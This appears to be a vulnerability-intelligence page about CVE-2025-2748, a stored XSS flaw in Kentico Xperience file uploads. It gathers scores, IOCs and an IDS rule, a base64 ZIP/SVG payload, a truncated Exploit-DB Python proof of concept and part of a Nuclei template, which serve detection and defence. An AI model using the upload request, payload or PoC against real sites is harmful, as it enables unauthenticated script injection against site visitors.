CVE-2025-2748
published 2025-03-24CVE-2025-2748: The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This…
PriorityP179medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
59.07%
99.0th percentile
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kentico | xperience | <= 13.0.178 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/CMSPages/GetResource.ashx?image=/App_Data/CMSTemp/MultiFileUploader/00/00000000-0000-0000-0000-000000000000/↗
commandPOST /CMSModules/Content/CMSPages/MultiFileUploader.ashx?Filename=<zip>&Complete=false with Content-Type: application/octet-stream↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/CMSModules/Content/CMSPages/MultiFileUploader.ashx|3f|"; fast_pattern; startswith; content:"Filename|3d|"; content:".zip"; within:150; content:"Complete|3d|false"; reference:cve,2025-2748; reference:url,labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/; classtype:attempted-admin; sid:2061259; rev:1; metadata:affected_product Kentico_Xperience_CMS, attack_target Web_Server, tls_state plaintext, created_at 2025_04_03, cve CVE_2025_2748, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_04_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
UEsDBBQAAAAIADR5gVqiOVAGEwEAAHwBAAAHABwAeHNzLnN2Z1VUCQADc8nrZ033sWd1eAsAAQT1AQAABBQAAABtkEFPAjEQhe/7K8bxognudAUO6C4kAiEmRklEjcfKlqVa2k1bWPj3zrIXD/bUvHnzvdfmk+POwEH5oJ0tMEsFQojSltI4qwq0DifjJL+YvUxXn8s5hEMFy7eHp8cp4A3RR39KNFvN4PV9AVmaEc2fEXAbY31H1DRN2vRT5ytaeFlv9ToQG6k18hIxLMvSMpY4TpK8Rf8pkiF8yaCW3m204SabvTEI3NaG4p+AWyFEC2QUAOS1M6fKWdBlgdFraSujEGqnbeR10RMgekMBQ74hcIAp8FKI0Uic3+/djzoLgwEL1CHD2us6QjzVPIvqGOlbHmSndql8pFE+XpVuvd8pG9PS7aS21/dnAHVe/s626Dj5BVBLAQIeAxQAAAAIADR5gVqiOVAGEwEAAHwBAAAHABgAAAAAAAEAAACkgQAAAAB4c3Muc3ZnVVQFAANzyetndXgLAAEE9QEAAAQUAAAAUEsFBgAAAAABAAEATQAAAFQBAAAAAA==
- →Detect unauthenticated POST to MultiFileUploader.ashx with a .zip filename and Complete=false parameter — the core upload vector for CVE-2025-2748
- →Detect retrieval of uploaded SVG payload via GetResource.ashx referencing the CMSTemp MultiFileUploader staging path — indicates exploitation stage 2 (XSS trigger)
- →Match response body for 'alert(document.domain)' combined with Content-Type 'image/svg+xml' to confirm successful XSS payload delivery from uploaded SVG
- →Use FOFA query 'app="Kentico-CMS"' to identify exposed Kentico Xperience instances for proactive scanning
- →The exploit packages a malicious SVG inside a ZIP archive; look for ZIP uploads (Content-Type: application/octet-stream) to MultiFileUploader.ashx containing embedded SVG files with script tags
- ·The Nuclei template uses a hardcoded GUID path (00000000-0000-0000-0000-000000000000) for the staging directory; actual deployments may use different GUIDs, requiring path enumeration
- ·The vulnerability is unauthenticated (PR:N), meaning no session or credentials are required to upload the malicious ZIP — perimeter-facing Kentico instances are directly exploitable
- ·The Snort/ET rule only covers plaintext (non-TLS) traffic; HTTPS-protected Kentico deployments will not be detected by this signature without TLS inspection
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fx68-23vp-xpxr: The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored
ghsa_unreviewed·2025-03-24
CVE-2025-2748 [MEDIUM] CWE-79 GHSA-fx68-23vp-xpxr: The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
VulnCheck
Kentico Xperience CMS Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2025·CVSS 6.1
CVE-2025-2748 [MEDIUM] Kentico Xperience CMS Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Kentico Xperience CMS Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
Affected: Kentico Xperience CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-2748
Exploit PoC: https://vulncheck.com/xdb/ed621dde3001
Suricata
ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)
suricata·2025-04-03·CVSS 6.1
CVE-2025-2748 [MEDIUM] ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)
ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kentico Xperience CMS Cross Site Scripting via Unauthenticated File Upload Attempt (CVE-2025-2748)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/CMSModules/Content/CMSPages/MultiFileUploader.ashx|3f|"; fast_pattern; startswith; content:"Filename|3d|"; content:".zip"; within:150; content:"Complete|3d|false"; reference:cve,2025-2748; reference:url,labs.watchtowr.com/xss-to-rce-by-abusing-custom-file-handlers-kentico-xperience-cms-cve-2025-2748/; classtype:attempted-admin; sid:2061259; rev:1; metadata:affected_product Kentico_Xperience_CMS, attack_target Web_Server, tls_sta
Exploit-DB
Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
exploitdb·2025-05-13·CVSS 6.1
CVE-2025-32370 [MEDIUM] Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
---
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: [email protected]
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse
def create_svg_payload(svg_filename: str):
print(f"[*] Writing malicious SVG to: {svg_filename}")
svg_payload = '''
alert("XSS");
'''
with open(svg_filename, 'w') as f:
f.write(svg_payload)
def zip_payload(svg_filename: str, zip_filename: str):
print(f"[*] Creating zip archive: {zip_filename}")
subprocess.run(['zip', zip_filename, svg_filename], check=True)
def
Nuclei
Kentico Xperience CMS - Unauthenticated Stored XSS
nuclei·CVSS 6.1
CVE-2025-2748 [MEDIUM] Kentico Xperience CMS - Unauthenticated Stored XSS
Kentico Xperience CMS - Unauthenticated Stored XSS
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
Template:
id: CVE-2025-2748
info:
name: Kentico Xperience CMS - Unauthenticated Stored XSS
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS.This issue affects Kentico Xperience through 13.0.178.
impact: |
Unauthenticated attackers can upload malicious SVG files containing JavaScript payloads that persist on the server, allowing stored XSS attacks when the
No writeups or analysis indexed.
2025-03-24
Published
Exploited in the wild